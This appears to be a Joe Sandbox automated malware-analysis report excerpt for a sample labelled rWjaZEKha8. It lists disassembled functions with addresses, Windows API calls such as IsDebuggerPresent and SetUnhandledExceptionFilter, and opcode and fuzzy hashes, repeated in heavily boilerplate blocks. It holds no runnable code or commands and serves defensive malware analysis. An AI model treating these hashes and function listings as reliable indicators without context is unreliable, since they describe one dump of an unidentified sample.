                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  • Opcode ID: dcfd91127e66baedc0cd2ddeeb308028a1102fbb2c24e05c3fb33506f1288b22
                  • Instruction ID: ead1d7ef13feb631f35e5ebadc1577bda923b74eb999a8b9f640d122be8c58c7
                  • Opcode Fuzzy Hash: dcfd91127e66baedc0cd2ddeeb308028a1102fbb2c24e05c3fb33506f1288b22
                  • Instruction Fuzzy Hash: 8E62F4716002448FDF19DF34C8956EA3BF1AF69304F09857DED9E8B282D771AA46CB50
                  Function 0019866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00198767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00198771
                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 0019877E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: e746126dba20e3b7ace4051c6c35c7c561621ee49b0b2e9dee47f4169b79ee8f
                  • Instruction ID: 64f6042f5ca6c61f9fadc427c0eb42e5618a552fa382967a18c4dd2492626f40
                  • Opcode Fuzzy Hash: e746126dba20e3b7ace4051c6c35c7c561621ee49b0b2e9dee47f4169b79ee8f
                  • Instruction Fuzzy Hash: FA31C47590122C9BCB25EF64D889B9CBBB8BF19310F5041EAF81CA7251EB349F858F45
                  Function 0019CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction ID: 08e33d3600573d492955a3ea39d3820f913fb191b23e0562641f3686960c5d88
                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction Fuzzy Hash: 07021C71E002199BDF14CFA9C8906AEBBF1FF88314F25416AE959E7384D731AA41CB90
                  Function 0018A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0018A662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,001AE600,?,?), ref: 0018A6B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  • Opcode ID: 9f531b0a1a07cdd30bd3cd4bf20ae0626442a94a1f89058d5dbc494791723011
                  • Instruction ID: 22bbad659ea57ca2734eb55736661c0fa9e7edc085fe3192850d743d7861ca76
                  • Opcode Fuzzy Hash: 9f531b0a1a07cdd30bd3cd4bf20ae0626442a94a1f89058d5dbc494791723011
                  • Instruction Fuzzy Hash: C7017176140308BFD7109FA4DC45F9B77FCEF19720F004826FA0897150D3709A558BA9
                  Function 00176EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(0018117C,?,00000200), ref: 00176EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00176EEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: b510fab22f30da2f00d4050872c594d687f3e73c943f9d57373c10f3e77dd46a
                  • Instruction ID: 6adba02477a051b48e4676e539f461714fefd41b1d37b1dd3b9fe8337a1680f1
                  • Opcode Fuzzy Hash: b510fab22f30da2f00d4050872c594d687f3e73c943f9d57373c10f3e77dd46a
                  • Instruction Fuzzy Hash: 8CD0C9353C8302BFEA514A74CD06F6BBBA4A757B92F20D514B36BE98E0CA7090549629
                  Function 001A1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A118F,?,?,00000008,?,?,001A0E2F,00000000), ref: 001A13C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: c42e3e86783766e46cc6c4467fcd0cd2bfe37a6b4a5714b1cb21935e619a039e
                  • Instruction ID: bc73e5d55b99cfee8447b28937c343209c75f293b7b59a3b5d02d8549cf0bc46
                  • Opcode Fuzzy Hash: c42e3e86783766e46cc6c4467fcd0cd2bfe37a6b4a5714b1cb21935e619a039e
                  • Instruction Fuzzy Hash: 20B15F79610608EFDB19CF2CC486B657BE0FF4A364F258659E899CF2A1C335E991CB40
                  Function 0017407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  • Opcode ID: d5a54abab1bd0c449d2d54b087cd891baeac4166d5fb2e5f3e3d4c3882c7c755
                  • Instruction ID: fab7061d14d83263b98d31baa67ad7bfce8d2ae4ff1e3aa89d7747598e163b59
                  • Opcode Fuzzy Hash: d5a54abab1bd0c449d2d54b087cd891baeac4166d5fb2e5f3e3d4c3882c7c755
                  • Instruction Fuzzy Hash: 67F1B3B1A083418FD748CF29D880A1AFBE1BFCC208F15896EF598D7711E734EA558B56
                  Function 0017ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 0017AD1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: f08a73a799a78168959dbbc61b80fe8a3f944fd1f2947dec8468b3ca81d92e9a
                  • Instruction ID: bc472f722545509d5c900402285c4b5058c3eb9040a7060616be71c4439ea267
                  • Opcode Fuzzy Hash: f08a73a799a78168959dbbc61b80fe8a3f944fd1f2947dec8468b3ca81d92e9a
                  • Instruction Fuzzy Hash: 5AF01DB0E0020C8BC738CF68ED416EA73B5FB99711F604299EA1943B54D370AD80CE61
                  Function 0018F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,0018EAC5), ref: 0018F068
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 6f7b944e62199162474659a99b225c1d25f1e34b58fafb3a51f0cb31f34a78d7
                  • Instruction ID: 2f11fa5abe8133e307758de6bda79f41c3a83acd677269c54c88d0ca24a009ec
                  • Opcode Fuzzy Hash: 6f7b944e62199162474659a99b225c1d25f1e34b58fafb3a51f0cb31f34a78d7
                  • Instruction Fuzzy Hash:
                  Function 0019B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: cf24450a0a014a9191d3aebb73910be3092bae1d8bc830a871c9edaf736c619f
                  • Instruction ID: be2125268606d9d551248b9bf7fa6b23fd2b51527e0a1fe7bcd2905f69953529
                  • Opcode Fuzzy Hash: cf24450a0a014a9191d3aebb73910be3092bae1d8bc830a871c9edaf736c619f
                  • Instruction Fuzzy Hash: 4AA001B4602201AB97408FB6AA093097AA9AB46691709C26AA519C6960EA6485A09F01
                  Function 00185C77 Relevance: .8, Instructions: 800COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                  • Instruction ID: ca9ee79d3e8fc9359b10bf3665ed951ce975aaf92f935af3bf04e1df7698128d
                  • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                  • Instruction Fuzzy Hash: 68620971604B859FCB29EF38C9906B9BBE2AF55304F14856DD8AB8B346D730EA45CF10
                  Function 001870BF Relevance: .8, Instructions: 773COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                  • Instruction ID: 2fbb530c9dba19edd9f989b91b0cdf623e4e9815835a4953a9520819a307aae5
                  • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                  • Instruction Fuzzy Hash: 2A6216716087469FC719EF28C8905B9FBE1BF55304F24866DE8AA87782D730EA55CF80
                  Function 0017ED14 Relevance: .7, Instructions: 694COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                  • Instruction ID: fca0e889a7bf4a7092974577d0df1abd1deee8c1b27e5777637032ea5d4fac76
                  • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                  • Instruction Fuzzy Hash: 96523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                  Function 00186A7B Relevance: .5, Instructions: 509COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d64215ebb33c2302c064a1b990a09dbffd6cd8fe806d3734f665c9ffba31c401
                  • Instruction ID: 341598e79a2c957c690d61435a54e8fd2e24e49e5ec7d44a2fd0edb3036a21f5
                  • Opcode Fuzzy Hash: d64215ebb33c2302c064a1b990a09dbffd6cd8fe806d3734f665c9ffba31c401
                  • Instruction Fuzzy Hash: E012C1B17047068BC72CEF28C9D06BAB3E1FB54308F14892DE597C7A81D774AA95CB45
                  Function 0017BE13 Relevance: .4, Instructions: 449COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dd01b1eb8a666e558dfd9118cbeb11ed5be1c442eba5f8fb27d33da380231728
                  • Instruction ID: ba3ea576e8835b3b2ceb6f15d3dd9ecc30f810c0f6a86b70d133ec67aee79a5c
                  • Opcode Fuzzy Hash: dd01b1eb8a666e558dfd9118cbeb11ed5be1c442eba5f8fb27d33da380231728
                  • Instruction Fuzzy Hash: 49F18975A083019FC718CF29C484A6ABBF2FFD9314F148A2EF49997352D730E9458B92
                  Function 00190B43 Relevance: .3, Instructions: 345COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                  • Instruction ID: 9aea2f9446368f45179367aabffbcca010c01294f24c8bf2676e402c9e5c6ede
                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                  • Instruction Fuzzy Hash: C1C1913A2151934EDF2F8679853403FBAA15AA6BB131A07ADD4F3CB1D4FF20D564DA20
                  Function 00190F78 Relevance: .3, Instructions: 341COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                  • Instruction ID: 0de0e203d6c781073934542de85559295aeae99384d6c068847a513ed75e56fd
                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                  • Instruction Fuzzy Hash: 90C1823A2151930EDF2E867A853403FBAB15AA2BB131A076DD4F3CB1C5FF20D564D620
                  Function 0019070E Relevance: .3, Instructions: 331COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                  • Instruction ID: fe4b973eb6cb558841432e9a1b304e0947f1b6988e10daab453689f405bdc9b2
                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                  • Instruction Fuzzy Hash: 2FC1923A2051930EDF2E8679857403FBAA15EA6BB131A076DD4F3CB1C5FF20D564DA20
                  Function 00186646 Relevance: .3, Instructions: 325COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
